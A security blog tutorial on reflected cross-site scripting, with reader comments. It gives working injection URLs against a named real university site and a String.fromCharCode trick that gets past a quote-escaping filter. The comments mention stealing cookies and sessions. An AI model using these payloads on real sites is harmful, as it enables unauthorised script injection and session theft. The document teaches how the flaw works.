XSS and BYPASSING A FILTER

I hope you have already heard about Cross Site Scripting know as XSS. I have focussed on finding an XSS hole and bypssing a filter.XSS is a web application vulnerability that occurs due to improper or no filteration of user's input . It enables the malicious attackers to inject client-side script into web pages.
This tutorial is for educational purpose and make the people aware of such a threat.I recommend readers if they abide by the blog's Disclaimer then they can proceed reading this post otherwise leave this page immediately.
You might have tried finding an XSS hole by inserting a script like this
<script>alert('XSS')</script> in Search fields and hoping for a box to popup saying XSS. But its not always the way to find a XSS bug.

This example will make you everything clear.

Okay, go to this URL

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=Overview

Lets Replace 'Overview' with any keyword . Say 'test'
and hit enter

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=test

Now check the source code of page and search for keyword 'test' by using Ctrl+F
and we can find that in the code.


Note:Click on the images to zoom them.

Carefully, see where it got inserted in the source code

<title>Chitkara Educational Trust > test</title>

Now lets replace the 'test' with </title><h1>XSS</h1> and see what happens

Note:<h1> It is the html heading tag </h1>

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><h1>XSS</h1>

We can see the keyword 'XSS' displayed on the webpage.

Lets again see the page source

We entered </title> to complete the title tag ( <title>) and <h1>XSS</h1> is the actually html tag we wanted to see on the page.

I hope it was a simple part and is clear to you.

Now Lets try to execute a javascript code <script>alert('XSS')</script>. A popup message box saying XSS should appear on the webpage.
Lets go to this URL

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><script>alert('XSS')</script>

But Nothing Happens !!!

Now check the source code again
See the slashes ( \ ) automatically inserted before the single quotes ( ' ) ,we entered. Obviously,due to this our code didn't execute.This is a kind of filter that we need to bypass .

Here we will be using a javascript built in function called String.FromCharCode() that is used to encode/decode strings. Now both these codes

<script>alert('XSS')</script> and <script>alert(String.fromCharCode(88, 83, 83))</script>
has the same function but we can see that there are no quotes in the second code.

Note: 88 and 83 are ASCII values for X and S respectively. Visit this http://www.asciitable.com for more.

Finally, try this

http://www.chitkara.edu.in/chitkara/esl.php?page=overview.php&sitetitle=</title><script>alert(String.fromCharCode(88, 83, 83))</script>

Yes, it worked.

I hope you liked this demo :)

By Aneesh M. Makker , an ethical hacking enthusiast from engineering department of Punjabi University.
Link to facebook profile .
Suggest Article

Subscribe to Posts....

Enter your Email-ID and get "Security Tips and Hacking Tutorials"alert in your inbox,we promise to keep your email private and safe.

comment 10 comments:

Anonymous said...

great job man. plz Also write on stealing cookies using XSS

Shubham said...

Step by step, clearly got it. thanx guyz

Aneesh said...

Thanx frnz , keep visiting :)

Shekhar Sahu on October 4, 2010 at 9:07 PM said...

Very useful :p

Ramkumar on October 15, 2010 at 10:23 PM said...

Great detailed guide, This is my first visit to your blog, I have suggestion to make, can You kindly increase the Font size by few pixels, Its very small in wide screen

Aneesh said...

Thanks Ramkumar :)

Anonymous said...

thanks but wt bro shud be next step.........the main step....XSS takes place on many sites bt .....this is only the half part.........wt shud be done after gting site vulnerable....can we get into .....if yes then how ?????? waiting......

Aneesh said...

These kind of XSS holes can be exploited to inject iframes or steal sessions. Silmply they are giving you the chance to inject client side scripts. Now its upto you how you proceed. Moreover such posts are meant to aware you about vulnerabilities and fixing them ,not for hacking purposes. :)

ashwin on December 1, 2010 at 10:06 PM said...

nice tutorial aneesh, would have been better with introduction and more explanation. also please create proper links, i had to typein all the URLS bcoz f security, ofcourse u can crack this.

Faisal Ahmed on November 12, 2012 at 3:35 PM said...

Thanks for this tutorial .

Post a Comment

This blog is "DoFollow",Use a "Real Name" rather than using "Keywords" otherwise comment will be rejected.

Delete this element to display blogger navbar

 
© 2013 SecurityHunk All Rights Reserved and Template by Fresh Blogger Templates